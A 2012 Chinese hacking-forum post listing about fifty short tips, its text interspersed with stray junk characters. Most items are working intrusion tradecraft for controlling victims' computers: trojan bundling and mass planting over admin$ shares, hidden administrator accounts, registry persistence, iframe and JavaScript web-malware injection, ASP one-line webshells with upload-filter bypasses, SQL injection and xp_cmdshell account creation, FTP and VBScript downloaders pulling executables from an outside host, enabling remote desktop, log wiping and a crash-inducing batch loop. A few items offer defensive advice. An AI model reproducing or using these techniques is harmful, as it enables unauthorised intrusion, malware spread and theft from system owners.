找回密码
 立即注册
查看: 2989|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,1 ~8 ?) [: e+ a% O/ a
cacls C:\windows\system32 /G hqw20:R
: k  ^% Q1 c3 Y  n+ D$ f' D- L思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入) y% ?2 T/ Q+ c) L' I
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
7 k  H- A1 @: F$ j) P+ a( z* q0 v2 D9 G6 o) j7 A/ z0 B3 C
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。& \" e; R2 z& {1 y, y/ d& t; M6 r8 Y( ]
* c. j2 \& U0 k1 @8 ]. e/ H
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 O  s; w) Y/ K- u( J
, p3 F; }9 Q5 r* G0 L1 J  d1 A4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 h9 ?+ }( C. [: \7 e* {7 q1 U# U; V# j) t: Y
5、利用INF文件来修改注册表
; f* g2 n/ v2 U4 `[Version]- p- P/ e, n$ \% z& [% P
Signature="$CHICAGO$"
9 J+ T4 _, u  F[Defaultinstall]/ o, ?. q' Y5 I& z
addREG=Ating* l* A' C  a8 |- `, h9 |
[Ating]
, s! n4 \( i6 Z0 [0 z& y) y/ Q: iHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
9 s  W, |3 Y% }3 Z3 b* s以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
- A, A7 Q. g9 r/ P2 U6 }) W: yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
/ V6 x7 Y! b" [, z% o  f) t其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU& x7 A/ T, p) ]8 _  U" N
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
' C3 w- {) s5 bHKEY_CURRENT_CONFIG 简写为 HKCC
! A* m$ R- I# U: x9 T0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值7 k$ ^- K+ g# H4 ^4 p- m( Z, c- }
"1"这里代表是写入或删除注册表键值中的具体数据
! C6 D, H$ X  M  u% y) D# Q) N% K- O% X" S0 `
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 s7 m2 A9 ~& c; A1 M8 ]9 o. C
多了一步就是在防火墙里添加个端口,然后导出其键值6 ^; `8 P" h8 y7 K* Q- s6 e4 T
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]& Q& F3 Q" @: z0 B4 L) e5 m

% E2 n9 O* L2 h7 q8 d2 B  a8 {7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽' D4 v# a; z& w7 \. }* ~+ Y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
  o7 j$ P6 B5 C/ E1 `" g
4 n/ ]* ~* Z6 |8 C8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. T2 x; b$ h6 k6 G. {2 r) t

# L3 ^- W$ p' g- b. A9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
( o% ]# o" _' w& a& b5 V3 w6 O可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
5 J  b/ h4 f( e+ t* M
. l! z5 B( P! d" s6 P- d/ Y- D! \, Q, `10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; V4 K* \) B! y: |

; \+ |5 X% k5 r2 R2 z7 w. t6 u* b4 l11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,) i! g: w- C, b) b7 k7 l3 u% I
用法:xsniff –pass –hide –log pass.txt; b# m- K: H+ Z4 ~/ G

7 D1 t' `4 F5 ^, \12、google搜索的艺术2 J$ E! n6 }, z4 E; a0 I( f3 n
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”/ E( O5 t  l3 J! N( `( j- a
或“字符串的语法错误”可以找到很多sql注入漏洞。
0 K# R% A" p/ Z6 @  K) z1 e; J* I! X' w, Z: \% o9 I
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。2 E! c7 q$ @8 z! k
) J* o+ M* A3 ^' l4 j8 H
14、cmd中输入 nc –vv –l –p 1987' j+ Q4 o! R2 q# W
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
5 y. P4 Z/ J9 }. D
0 H8 C$ T/ J9 ~* ~5 o15、制作T++木马,先写个ating.hta文件,内容为6 H3 _: t% J# \) h! ?4 C/ U/ ]
<script language="VBScript">. M: X) H& h* A$ f6 X) T% d
set wshshell=createobject ("wscript.shell" )  ?8 z. }2 }$ c" g0 s; j
a=wshshell.run("你马的名称",1)/ `) q& S) n9 V
window.close  k* `/ }6 M, @6 _, d3 z  x6 d' H2 A
</script>
9 q+ n6 u+ T, R$ ]) b. ~再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。3 F" R0 i' R+ H- R" N( h! Y
# A' T' w" l4 ^2 L' @
16、搜索栏里输入
8 L+ b; X9 a7 a  _关键字%'and 1=1 and '%'='
5 L7 b# K5 Z5 h9 f关键字%'and 1=2 and '%'='9 [4 a, u9 v5 N" Q- W% N
比较不同处 可以作为注入的特征字符7 c: D& |! }* U- G/ y1 ]
# X* N# S. d. u5 h
17、挂马代码<html>
$ k4 U1 B' P6 Q/ k3 q' R<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>" C* p: _# X8 a5 v' K4 @' [) @5 d5 g
</html>
; S0 K5 U* H! n( p: r- x& w% S& ^2 J9 k% ]0 w7 N5 ]' Y. U8 x
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,/ p& d; V' i& c- o$ A+ S1 e
net localgroup administrators还是可以看出Guest是管理员来。, o6 }: g3 K) ?- M5 q( a
3 m5 B: K% ?' q* e" l
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' Y4 q6 j6 p) X4 e' C6 {用法: 安装: instsrv.exe 服务名称 路径
! Z# @, n+ R) @* ?: P" I' K3 m$ V' i卸载: instsrv.exe 服务名称 REMOVE
; f& P3 v# A7 O4 ~" }! M
" ?7 W8 \# j. E3 s8 u  ?
' B! ]) W; L0 K% Z% c% O) k& H21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
; h2 W8 [/ Z0 Y3 k5 P) j+ G, u( U, Z不能注入时要第一时间想到%5c暴库。
/ l+ V* D( ~7 n( Q; e+ ~& J* ]
- \6 q. l$ F* R. K- G$ u% j22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
7 k, A& ?, L* R$ @* E! E1 v  J; N3 l
23、缺少xp_cmdshell时6 f$ ^: x# @, w! u' f# a+ N
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 ]% I9 e6 t( a: E/ d假如恢复不成功,可以尝试直接加用户(针对开3389的)9 E! s. A6 Z; N& q% S* S
declare @o int
( S& b) e* l7 o( N- Aexec sp_oacreate 'wscript.shell',@o out
- N9 e% L9 N/ n# Lexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
# O5 H7 I6 X# K! Z) O' ^
( N& l% }) i: K; r/ S- F- s24.批量种植木马.bat& ~5 u4 L& M3 ?: \
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中. F: v- E9 D' ]
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间: b$ p3 T% r/ D8 W
扫描地址.txt里每个主机名一行 用\\开头; S; M$ S, |6 f

2 o8 D  O! L. X8 z; t25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。- h% C6 O; V# X/ l  F2 L& G

/ \1 k* n6 F7 u% t26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.* \0 Z. D/ I. W- C+ L& L3 f
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
+ @- a! {! d+ s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马% I- k/ @! j8 q6 |9 E8 L6 h, k3 f; d/ r
$ s; {+ c$ _3 @: l6 N, O
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP5 S0 Y3 m+ _0 c6 E
然后用#clear logg和#clear line vty *删除日志! R) G$ S9 V, G' p
5 c( p' @  S. I5 S0 Y: g+ L0 V7 C
28、电脑坏了省去重新安装系统的方法
1 e; k& f4 J8 p& L" W; n# w% t" R纯dos下执行,. U! F* S" v! }& q
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, Y" ^" [. W" F  Q: W$ X! }2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config& c  w  S# F* s$ |, i% f" j

( x: C1 P8 b: \/ s29、解决TCP/IP筛选 在注册表里有三处,分别是:
# D  c) |$ A- i* Y* HHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
) L* [' O3 Z" s& b; W8 Z9 VHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% b% v  k; N9 R* B, y" `, X3 I! h: ]# U- |
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 e: B  M1 D1 b& h& r% N9 O分别用: d8 W: M5 h* D( @: O! S" f
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ Y7 m+ ]9 u$ T  x! x$ r. |5 M
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 o* Q7 N* m* L6 w% F0 ^4 D& p' M/ Pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 e  z7 t5 }4 |! B: ]3 @0 N
命令来导出注册表项$ B# ^, Z; I2 k; K4 x9 t! q
然后把三个文件里的EnableSecurityFilters"=dword:00000001,4 d/ z5 R5 t. ?4 l# r0 O
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
4 Z' }1 z/ A4 S- w0 Lregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。4 L0 k. G& @# _9 a  j( r2 a

) n- @' u9 q& C) Z2 L30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
8 w+ r% v' J0 v# U3 G0 t" ZSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3- u/ Q4 t3 c) b' H; L; Q2 `

- c" g: l" e/ l31、全手工打造开3389工具
$ k; B- d$ U5 z- r打开记事本,编辑内容如下:* Z9 N. l/ f7 N3 r, ^& x
echo [Components] > c:\sql" R. A3 [  l9 D; @4 E& F
echo TSEnable = on >> c:\sql$ t* p; C/ F1 e
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
# x  x& K8 m0 C! c3 F* m! }编辑好后存为BAT文件,上传至肉鸡,执行
% c5 L1 D$ A" t- ]% Z& c9 \
, a. l6 P' G4 p5 Z* e1 D32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
# f$ C# W  z* W( \; Z+ k% D" U- I* S+ n
. U+ y/ m3 d  b( R" ^7 T/ |$ G33、让服务器重启) `# r$ t8 U2 v: w2 @
写个bat死循环:
9 p5 r4 I( H2 t. S% C4 w2 K1 f@echo off" P* w2 B5 m% U0 v" G
:loop1
; I, w+ h4 S) xcls
; H. ^2 q# V) Istart cmd.exe
& Q9 u# e* [5 W6 H- c9 z  J1 Ggoto loop19 w6 b6 \9 S3 ?6 z1 W8 M1 {
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
. _9 b/ l/ _5 G$ T8 r% a
. Z; g) [6 }2 N34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
8 K$ g1 @8 V% C4 d- `  G@echo off
( E% S; N* J! \/ v% Y7 Edate /t >c:/3389.txt
  [0 T( j; G% x* {! a$ b* K: {" stime /t >>c:/3389.txt
4 z1 O. \; ?% N1 ~6 j+ M7 ^, S4 r) gattrib +s +h c:/3389.bat
! W) D* L. w1 M$ P2 p; pattrib +s +h c:/3389.txt
1 M( n$ r4 B" a: g8 fnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt, I' ~$ [' o3 X1 H( L
并保存为3389.bat
( e$ A! {" Y% A9 e0 x打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. W0 r8 r3 q2 [% Z: v, u. e! l5 k; D$ J: t2 l
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
6 w' p- x& a, ^; J+ O$ S" Mstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)3 D2 I+ k* c0 ?6 F$ {5 J" H' l
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
7 `, `& T, [- r9 P2 {
' S/ A( Z; `, {9 O7 h3 H  w4 ~! \36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
/ r0 Y; v- p6 V  Xecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址6 ]9 `. h! B/ T9 B4 _
echo 你的FTP账号 >>c:\1.bat //输入账号
3 c3 K7 I& u! {echo 你的FTP密码 >>c:\1.bat //输入密码
2 u5 U  f! [# p( ?9 q4 Secho bin >>c:\1.bat //登入
: w& B5 E2 {9 k' F' o: Aecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( i: Y+ Z2 q- D! C/ o
echo bye >>c:\1.bat //退出
5 s. S; v  o! z: u* n5 z0 p! I% T然后执行ftp -s:c:\1.bat即可) z/ i( d$ r2 {) f
6 A8 j7 k2 L& I: K- H; \
37、修改注册表开3389两法% m+ h' A' j* u6 T% j( @+ p
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
) `2 |: G% M+ v" @" v. vecho Windows Registry Editor Version 5.00 >>3389.reg
( X4 O, y" q9 |. B2 ^6 Z$ e7 Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
, \' x4 m, i. u' F4 Vecho "Enabled"="0" >>3389.reg
( v# n3 i5 f0 G0 ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
2 B" Y5 g% P6 ?. ~9 n, P9 [NT\CurrentVersion\Winlogon] >>3389.reg
" X6 ~5 |  k/ ?, oecho "ShutdownWithoutLogon"="0" >>3389.reg
3 g3 j; `% a$ s7 pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
  S1 g% u1 K) z; ]5 h9 d>>3389.reg& i0 L, k9 I- i4 ]6 [+ g: m# }
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% b, f2 Y5 C' z6 D" A; n- Z& G6 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
0 c- A$ E: O/ j1 P0 @>>3389.reg$ |5 w" V2 U4 S+ ^. n9 c8 x
echo "TSEnabled"=dword:00000001 >>3389.reg) x6 e+ E% F* v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
; V9 S+ u  F' {4 {echo "Start"=dword:00000002 >>3389.reg
1 D' D% g8 X( i: mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
" k  V9 [* c: I1 B4 ^- b>>3389.reg
' n0 u5 l1 p2 R: K5 t4 {echo "Start"=dword:00000002 >>3389.reg
) k+ j0 ?( i$ s8 Cecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg7 \# M. Q* ]+ u1 s& i
echo "Hotkey"="1" >>3389.reg* }8 E# \8 r' v9 }+ Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# p2 V& m2 r( B0 ^9 ?' h# I3 N  q3 }Server\Wds\rdpwd\Tds\tcp] >>3389.reg0 m! l, Y5 N% C, j' R9 M* \
echo "PortNumber"=dword:00000D3D >>3389.reg5 y% p3 O6 P* D0 ?8 B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 H: T8 j7 v6 `8 A  b
Server\WinStations\RDP-Tcp] >>3389.reg
/ T0 p, e5 f1 @0 G5 B8 e" {echo "PortNumber"=dword:00000D3D >>3389.reg
( W8 C4 s, f8 c把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。( r. q% P+ A. a3 _
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)! }. F& l# k1 S. Z! B  Q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效/ R& f7 ^5 y. G, i9 r
(2)winxp和win2003终端开启
4 E6 B- D) t, a9 U$ E用以下ECHO代码写一个REG文件:& C# e, `7 h  @6 Z4 V( w
echo Windows Registry Editor Version 5.00>>3389.reg
* f' K/ B! ]  {4 m1 G% k2 \, pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  d, d* ~/ i/ m0 P5 ]! r9 YServer]>>3389.reg5 o" M4 c0 f4 k( E
echo "fDenyTSConnections"=dword:00000000>>3389.reg
" J8 ^# l/ p% |8 q$ k6 l6 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ I! i0 D, [! p( s8 B) _( e
Server\Wds\rdpwd\Tds\tcp]>>3389.reg5 G% D' {# x5 I; l
echo "PortNumber"=dword:00000d3d>>3389.reg
  _4 r/ T: W6 I! r) Y4 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 o0 O6 k; a( _* `3 s9 HServer\WinStations\RDP-Tcp]>>3389.reg* a* R; m) v. P* C
echo "PortNumber"=dword:00000d3d>>3389.reg2 K2 ]( W1 z- e; q, G! z9 X) b
然后regedit /s 3389.reg del 3389.reg" ^9 I3 c3 a7 o  ?2 x
XP下不论开终端还是改终端端口都不需重启
# Z9 ?& W# s$ h0 r0 G3 v, p( n
2 }* |! i' n( A3 Y5 S4 F38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
& W( f* Y9 I! ]用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 ?' V' E' `0 z$ t7 f

, y/ s! W, O# m7 H39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!& ?6 A' \/ }) i9 g. [+ q  r4 |# `, u
(1)数据库文件名应复杂并要有特殊字符$ I$ i+ {4 B: o7 y6 _  Q
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
; p3 p: D0 o/ B9 X; H将conn.asp文档中的
* W+ |: L& W3 ^# v, b- g2 }DBPath = Server.MapPath("数据库.mdb")
$ t" g; k6 O5 B, c) cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath" j% {8 O1 I% v0 ]7 V$ {

8 A! K1 V" {" f2 N0 z8 O修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
( Z: a! {, N; S* Z  b# y9 W(3)不放在WEB目录里
7 p# M5 N% J1 m5 F; T$ Y2 _+ T) r* h
/ q4 Y" X9 d9 P9 e# [. R40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 X5 O8 s* X: |4 w+ m* |9 s4 Z8 x
可以写两个bat文件
: d8 a: n" u) ?8 C% m& s@echo off
9 M& |8 T6 v! C2 H@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe1 l, q+ e# \8 i/ g9 B! M
@del c:\winnt\system32\query.exe
$ S1 u  P9 J8 P" ]@del %SYSTEMROOT%\system32\dllcache\query.exe
2 Y, r0 n' X3 d$ R0 W@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
& L2 ^& n/ q. A- D0 [$ a
  u: Y1 H4 B/ Q# w: I1 q, ]@echo off
' o3 r, a- y9 k6 ]5 G' w, d@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 ?4 b" G* l1 |' Y$ q/ Z  r
@del c:\winnt\system32\tsadmin.exe
' Y1 \8 d1 [5 s! P2 P@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: C- x( ~  m( a7 [- Y- t  o/ J; u3 u; f! f5 D7 S, e4 B) D
41、映射对方盘符1 l: f  J% q0 ~0 |6 @! |+ \
telnet到他的机器上,
. C+ e& X8 C& }$ Z1 o8 r: x# n  m$ tnet share 查看有没有默认共享 如果没有,那么就接着运行
; T/ v# ^1 }; q( mnet share c$=c:, |$ U; P( x) ]2 {5 }+ i
net share现在有c$
9 o0 ~' Y, n+ M: n在自己的机器上运行: W9 e! o; s3 j
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
) ^9 o% n" K3 J- L1 }% Z+ P
7 O8 @8 e6 L/ S5 H4 M42、一些很有用的老知识
3 a$ |/ f( k/ i1 E" k1 o/ utype c:\boot.ini ( 查看系统版本 )
2 i( ~' }0 v1 Q& _* ~/ H" enet start (查看已经启动的服务)
( Q, r7 ~4 b( }5 Y2 P0 ^query user ( 查看当前终端连接 )  f8 B7 q; t) y+ q4 t" J
net user ( 查看当前用户 )
; B4 F/ c+ E/ b9 J( E1 y, E: F- n' }net user 用户 密码/add ( 建立账号 )1 T( G! @0 T0 w3 P) ^
net localgroup administrators 用户 /add (提升某用户为管理员)
) v5 I* C) t) k2 W. s$ o1 p! I0 Gipconfig -all ( 查看IP什么的 )0 z% N& |! H. A3 o2 W6 q+ w
netstat -an ( 查看当前网络状态 )) _- ^: H# U+ L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
# y4 I! o* H% r+ v) I! Y克隆时Administrator对应1F4' c! J: {7 r) n2 W& P! [2 m# l7 A7 I
guest对应1F5
0 G: ^( P" q+ ?5 I9 Etsinternetuser对应3E83 S. ^  k5 a. l- W: C$ @0 U

' [) Z7 b- g, L7 I9 [! @. j43、如果对方没开3389,但是装了Remote Administrator Service
5 s) r' m  Z; r. |3 T用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接1 g5 t2 Q7 K) B
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% u- x' V$ X* u3 ?9 C
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' S9 O0 P" Z- e8 }7 v

! r% ^6 ~+ N% J7 I44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
' _- R4 y( h5 _" C0 T本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) S- ~; [0 j$ h
* P8 Z' P' R4 S$ b0 W1 m$ ?3 N. J% F45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)% T) P1 l6 o- l  N0 D2 p
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open, X* _$ ~7 V! _  P2 {- N+ U0 ^" m
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =' w4 t7 i, Q, w5 L4 D
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
" I- f( p4 V" @1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. ?( k. Z8 F9 \5 {! U2 U2 P+ p(这是完整的一句话,其中没有换行符)5 t$ N! @- q. R4 s( R/ k
然后下载:- e/ @3 |! }; X+ Q, R" ]* a" |( C; L
cscript down.vbs http://www.hack520.org/hack.exe hack.exe2 u9 v) W: S8 W( @4 I' m

- V% i- f! ^* v+ G! I5 F3 a46、一句话木马成功依赖于两个条件:, s8 O) u, w. ^  A9 W+ r6 K
1、服务端没有禁止adodb.Stream或FSO组件
$ |# p$ p- d- _+ l2 ~2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。5 y' d0 N$ s  D
8 \# ^5 }3 m# T" I& d
47、利用DB_OWNER权限进行手工备份一句话木马的代码:0 k" H* }" `% P  v$ Z7 ]* {
;alter database utsz set RECOVERY FULL--3 H5 D/ Z2 q; ?8 G
;create table cmd (a image)--
5 l8 X5 `  a# j) x" V/ ?3 ~) b' K# `;backup log utsz to disk = 'D:\cmd' with init--9 d$ B+ q3 ^) l$ D
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
/ A  H4 P+ Q; @* j% C0 W8 Y: B2 p;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
2 J% h( J0 t8 O: t注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
( ^7 ]3 R7 ]! v# F# `. H% I9 S- O# L- Z
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" E' A& F. J% n" b, Z+ V4 V6 {& F9 u/ U
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
' a  o- m' ]' t' B1 n, D所有会话用 'all'。4 I4 Y; @) {4 \, g; n" z
-s sessionid 列出会话的信息。
, J0 W9 [$ q9 e-k sessionid 终止会话。3 Q& a  L" ?% d( a3 P( R# X  L- r: B
-m sessionid 发送消息到会话。1 ^) }5 W4 G4 F6 k+ n4 a+ O* P4 J$ c

$ c- Q; k: K7 R) F8 ^7 o! r1 A3 X3 xconfig 配置 telnet 服务器参数。' m6 N2 {1 Y/ {# v
) E+ T8 f# P/ v
common_options 为:/ S2 y' x6 c3 p& K' N) ^' t' r
-u user 指定要使用其凭据的用户
' d& X9 M% N- b8 m. D3 t4 o* T-p password 用户密码( l9 Z9 u( B( o2 p" l: o6 i% e

- G5 X6 k, Q$ `config_options 为:  @, o% p( |) ~
dom = domain 设定用户的默认域9 l$ k; ~5 T! d8 c" f
ctrlakeymap = yes|no 设定 ALT 键的映射
# A' j9 h8 x/ V* wtimeout = hh:mm:ss 设定空闲会话超时值
+ @$ x# J7 {/ X! l3 T6 Ctimeoutactive = yes|no 启用空闲会话。
4 {/ U/ y# a3 Y- zmaxfail = attempts 设定断开前失败的登录企图数。
  K* x1 Q& B( u3 F1 smaxconn = connections 设定最大连接数。
1 [* ]" `" ^3 D3 p0 S7 X4 Lport = number 设定 telnet 端口。4 `& }9 U* L! f' s+ o  q- P  d
sec = [+/-]NTLM [+/-]passwd
) y& k! O: G) u8 c$ x! U6 g设定身份验证机构( K/ S$ m( ?3 e5 T# C
fname = file 指定审计文件名。
/ G$ R  ?! X3 [. i4 Q9 Ifsize = size 指定审计文件的最大尺寸(MB)。
, E2 D: Z; j3 ]& Ymode = console|stream 指定操作模式。
/ ^8 \& O- A: k1 B' o1 H% u6 nauditlocation = eventlog|file|both4 `1 L$ G( B3 f7 d+ j" d# o% [
指定记录地点
. Y1 ~( T$ o# C( B. @' y' @audit = [+/-]user [+/-]fail [+/-]admin
( n/ r. Z6 e# ]+ S8 o' S& a- h
9 K  i! t, ?( ^6 c% p" b49、例如:在IE上访问:8 U8 x- ~5 B( R4 W( S5 P  x+ f
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/) V9 j& w) o' b3 M6 j1 u5 ?  J
hack.txt里面的代码是:) d% ]* a6 K4 d7 ?  i
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ ~4 b$ Q% h; r1 O把这个hack.txt发到你空间就可以了!
& f; T4 l' h5 ~8 [' Z0 r这个可以利用来做网马哦!
- U# y  ^; e* t* b0 A8 z
3 p: s7 v( b% a. U50、autorun的病毒可以通过手动限制!" p6 l" f/ d/ p
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!3 B  T! f& @$ w- ?
2,打开盘符用右键打开!切忌双击盘符~' s- m* C. |' T/ r  H8 k3 i
